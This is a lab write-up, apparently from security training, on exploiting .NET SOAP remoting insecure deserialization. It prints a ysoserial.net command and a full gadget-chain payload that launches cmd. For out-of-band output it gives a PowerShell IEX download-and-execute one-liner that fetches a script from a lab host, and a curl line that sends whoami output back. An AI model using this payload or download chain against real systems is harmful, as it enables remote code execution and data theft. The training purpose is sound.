.NET Insecure Deserialization

Task 1. Perform reconnaissance and find a soap-based web service Interact with all services of the web server to find the one that you can interact with via SOAP messages.

Note: The binary used is based on NCC Group's vulnerable remoting service. [https://github.com/nccgroup/VulnerableDotNetHTTPRemoting\]

Task 2. Execute code on remote machine Use ysoserial.net to generate a payload in SoapFormat. Note that you might need to remove <SOAP:Body> tags from the resulting payload before testing. Also make sure you respect the format of SOAP messages.

Task 3. Get command output using an out-of-band channel Turn blind code execution into a non-blind one. Prove that this is possible by executing a command and retrieving the output using an out-of-band channel.

The web application.

Viewing the source code reveals the .NET remoting endpoint.

Checking if the application reacts to a SOAP message.

Generate a payload using ysoserial.net.

ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -c "cmd /c [command]" -o raw

The geneerated payload is below. Becuase the length is not validated, you can edit the [command] without regenerating the payload.

<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<a1:TextFormattingRunProperties id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35">
<ForegroundBrush id="ref-3">&#60;?xml version=&#34;1.0&#34; encoding=&#34;utf-16&#34;?&#62;
&#60;ObjectDataProvider MethodName=&#34;Start&#34; IsInitialLoadEnabled=&#34;False&#34; xmlns=&#34;http://schemas.microsoft.com/winfx/2006/xaml/presentation&#34; xmlns:sd=&#34;clr-namespace:System.Diagnostics;assembly=System&#34; xmlns:x=&#34;http://schemas.microsoft.com/winfx/2006/xaml&#34;&#62;
  &#60;ObjectDataProvider.ObjectInstance&#62;
    &#60;sd:Process&#62;
      &#60;sd:Process.StartInfo&#62;
        &#60;sd:ProcessStartInfo Arguments=&#34;/c cmd /c [command]&#34; StandardErrorEncoding=&#34;{x:Null}&#34; StandardOutputEncoding=&#34;{x:Null}&#34; UserName=&#34;&#34; Password=&#34;{x:Null}&#34; Domain=&#34;&#34; LoadUserProfile=&#34;False&#34; FileName=&#34;cmd&#34; /&#62;
      &#60;/sd:Process.StartInfo&#62;
    &#60;/sd:Process&#62;
  &#60;/ObjectDataProvider.ObjectInstance&#62;
&#60;/ObjectDataProvider&#62;</ForegroundBrush>
</a1:TextFormattingRunProperties>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

In Burp:

• Remove the SOAP body tags

• Content type should be text/xml

• In order to have a valid soap message, a dummy SOAPAction header is required. This is related to SOAP and not related to this specific lab

• If you are receiving an error stating "Requested service was not found", you might also need to clear some whitespaces / newlines

Create a file named payload.txt with this contents:

c=whoami;curl http://10.10.27.2:445/

And then replace [command] with this:

powershell -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.27.2:445/payload.txt')"

Observe the results of the whoami command.